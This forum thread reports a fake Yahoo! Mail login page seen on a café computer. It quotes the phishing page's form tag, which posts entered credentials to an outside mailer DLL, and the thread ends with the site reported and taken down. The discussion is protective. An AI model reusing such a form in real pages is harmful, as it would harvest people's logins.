Yahoo! Mail bogus Web Page

[scratchONtheBOX]

Yahoo! Mail bogus Web Page

Beware of bogus websites in public computers!

I don’t actually know where to put this question, please move it if it should not be here.

In the café, someone’s had been playing with the Homepage and I came across to a BAD URL that seems to be an exact replica of http://mail.yahoo.com.

It’s an online account stealer/keylogger, I think (whatever we can call it). Going to the page, it’s the EXACT image of the Yahoo! Mail page.

Being aware of the tricks that a Web page can do, I don’t login on it since the address bar shows a different URL (rather than starting with http://mail.yahoo.com…). I checked the source of the page and its form is pointing to a different URL

<FORM METHOD="Post" ACTION="http://hotmail.homestead.com/~site/Scripts_ElementMailer/ElementMailer.dll" target=_top">

Weird and bogus (because of the “hotmail” word), instead of the normal that supposed to be:

<form method=post action="https://login.yahoo.com/config/login?d3epbmscrqbo1" autocomplete=off name=login_form onsubmit="return hash(this,'http://us.rd.yahoo.com/reg/login0/no_suli/login/us/ym/*http://login.yahoo.com/config/login')">

Further, this is where my question goes; I checked my cache but could not find this DLL file. I am trying to download the said DLL file from the URL to have someone examine it but it seems to be available online only. I’ve also tried to trace other pages from the homestead.com but could not yet find any trace (as of this time).

Anybody who can check this DLL file and could give warning of what its capabilities (harmful, I guess), would be highly appreciated.

And anybody who dare wants to check the URL (bogus Yahoo! Mail), please PM me.

Advance thanks!

Yo!

[|3lack|ce]

What was the offending url? Did you report it to the folks at Yahoo! in addition to warning us off about it?

[scratchONtheBOX]

I did not report it yet.

[|3lack|ce]

Thanks for the URL - I took the liberty of forwarding it to both Yahoo and Geocities (since the scam site is hosted there for those of you who've been keeping up with this from afar). Hopefully the offending site will be force closed today. I'd suggest you do the same - the squeekiest wheel tends to get fixed first.

[scratchONtheBOX]

OK, well then, it's down already.

And I think the source for the DLL is also down.

Thanks for the efforts, |3lack|ce

I hope anything like this phishing strategy would be stopped before it gets the wide public.

BTW, Googling for the word "Fake Yahoo mail", I have read something here which is familiar to what I had found out, and it says some important points like what I did and what |3lack|ce had suggested. Read some here - http://www.helpbytes.co.uk/fake_login.php

Thanks again |3lack|ce


Yo!